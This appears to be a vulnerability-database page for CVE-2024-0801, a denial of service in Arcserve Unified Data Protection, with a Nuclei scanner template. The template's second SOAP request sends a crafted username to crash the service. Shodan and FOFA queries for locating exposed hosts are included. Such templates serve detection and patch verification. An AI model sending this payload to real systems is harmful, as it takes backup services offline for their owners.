| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-0801 | 13 Mar 202420:23 | – | circl | |
| Arcserve Unified Data Protection Security Vulnerability | 13 Mar 202400:00 | – | cnnvd | |
| CVE-2024-0801 | 13 Mar 202419:04 | – | cve | |
| CVE-2024-0801 Unauthenticated DoS in Arcserve Unified Data Protection | 13 Mar 202419:04 | – | cvelist | |
| CVE-2024-0801 | 13 Mar 202419:15 | – | nvd | |
| CVE-2024-0801 | 13 Mar 202419:15 | – | osv | |
| Denial of service | 13 Mar 202419:15 | – | prion | |
| PT-2024-15834 | 13 Mar 202400:00 | – | ptsecurity | |
| CVE-2024-0801 | 4 Feb 202523:06 | – | redhatcve | |
| Microsoft's March Updates Fix 61 Vulnerabilities, Including Critical Hyper-V Flaws | 13 Mar 202405:38 | – | thn |
id: CVE-2024-0801
info:
name: Arcserve Unified Data Protection - Unauthenticated DoS in ASNative.dll
author: daffainfo
severity: high
description: |
A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll.
impact: |
Attackers can cause system crashes or unavailability, leading to service disruption and potential downtime.
remediation: |
Update to the latest version of Arcserve Unified Data Protection or apply available patches.
reference:
- https://www.tenable.com/security/research/tra-2024-07
- https://nvd.nist.gov/vuln/detail/CVE-2024-0801
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2024-0801
epss-score: 0.41843
epss-percentile: 0.98516
cwe-id: CWE-75
cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: arcserve
product: udp
shodan-query: http.favicon.hash:1015186617
fofa-query: icon_hash="1015186617"
tags: cve,cve2024,arcserve,dos,intrusive,vkev
flow: http(1) && http(2)
variables:
user: "{{to_lower(rand_base(6))}}"
pass: "{{to_lower(rand_base(6))}}"
http:
- raw:
- |
POST /management/services/EdgeServiceConsoleImpl HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>{{user}}</arg0><arg1>{{pass}}</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/xml")'
- 'contains(body, "Invalid user credentials")'
condition: and
internal: true
- raw:
- |
POST /management/services/EdgeServiceConsoleImpl HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>\</arg0><arg1>{{pass}}</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>
matchers:
- type: dsl
dsl:
- 'status_code == 503 && contains(body, "<h1>Service Unavailable</h1>")'
- 'status_code == 502 && contains(body, "<h1>Proxy Error</h1>")'
condition: or
# digest: 4a0a00473045022100c79cf7da22ec8dc2ed77ad030ecd4088cadadfdfbbd895bfc42a5848152ac29a02200f05cfa3f74999f270ea60c732f782fd411db11ac6cd473e19a44828b039d813:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation